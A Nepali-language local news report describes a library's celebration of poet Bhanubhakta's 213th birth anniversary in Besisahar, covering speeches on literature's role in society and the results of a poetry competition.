कार्यक्रमका विशेष अतिथि एवम् बेसीशहर नगरपालिका– ८ का वडाध्यक्ष पवित्रा थापा रानाले शुभकामना मन्तव्यका क्रममा साहित्य बिनाको समाज अधुरो हुन्छ भन्नुभयो । उहाँले मानवजीवनमा साहित्यको विशेष महत्व छ भन्नुहुँदै विकृतिका विरुद्धको हतियार पनि हो साहित्य भन्ने उल्लेख गर्नु भयो । उहाँले समाज रुपमान्तरणमा समेत साहित्यको महत्वपूर्ण भूमिका हुन्छ भन्ने बताउनु भयो । सो अवसरमा उहाँले भजन गाएर आफ्नो मन्तव्य अन्त्य गर्नु भएको थियो ।
आयोजक पुस्तकालयका अध्यक्ष नाराइनबहादुर सुयलको अध्यक्षतामा भएको उक्त कार्यक्रममा उहाँले भानुभक्तप्रति श्रद्धाञ्जली अर्पण गर्नु भयो । खास गरी आयआर्जन समूहसँग जोडिनु भएका महिला सदस्यहरूको सीप, ज्ञान, क्षमता अभिबृद्धिका लागि पुस्तकालयले प्राथमिकतामा राखेर काम गरिआएको र भोलिका दिनमा पनि सोही अनुसार अघि बढ्ने प्रतिवद्धता उहाँले व्यक्त गर्नु भयो । उहाँले उक्त पुस्तकालयको स्थापनाकालीन इतिहासको स्मरण गर्दै त्यो बेलामा सबै संस्था, सरकारी निकाय, प्रशासन लगायतको सहमतिमा यो भवन निर्माण गरी विश्वकै उत्कृष्ठ १० मा पार्न सफल भएको बताउनु भयो । यस पुस्तकालयको स्तर बृद्धिका लागि अझै पनि सबै पक्षको सहयोगका लागि उहाँले आग्रह गर्नु भएको थियो ।
सो अवसरमा पुस्तकालयको सञ्चालक समितिका उपाध्यक्ष सुशीलचन्द्र अधिकारीले कार्यक्रमको उद्देश्यमा प्रकाश पार्दै स्वागत गर्नु भएको कार्यक्रममा अर्का उपाध्यक्ष नारायणप्रसाद घिमिरे, पुस्तकालयका संस्थापक उपाध्यक्ष तेजनारायण अधिकारी, कार्यकारी सदस्य रमाराज खनियालगायतले शुभकामना व्यक्त गर्नु भएको थियो ।
सो अवसरमा गरिएको कविता प्रतियोगितामा अमृता असीम पहिलो, कमला केसी दोस्रो, कमला दनाई तेस्रो र सिर्जना घिमिरेले सान्त्वना स्थान हासिल गर्नु भएको निर्णायक समितिका संयोजक हरिप्रसाद अधिकारीले जानकारी दिनु भएको थियो । विजेताहरूलाई क्रमशः तीन हजार, दुई हजार, एक हजार, पाँच सय र प्रमाणपत्र वितरण गरिएको आयोजक पुस्तकालयमा प्रमुख मधुसुधन अधिकारीले जानकारी दिनु भयो ।
सो अवसरमा प्रायः आदिकवि भानुको व्यक्तित्व र कीर्तित्वमा प्रकाश पारिएका कविता वाचन गरिएका थिए ।
२१३ औं भानु जयन्तीको उक्त कार्यक्रम पछि प्रमुख जिल्ला अधिकारी खनालले उक्त पुस्तकालयका विभिन्न कक्षका साथै गतिविधिका बारेमा अवलोकन गर्नु हुँदै आगन्तुक पुस्तिकामा समेत मन्तव्य लेख्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=50028 0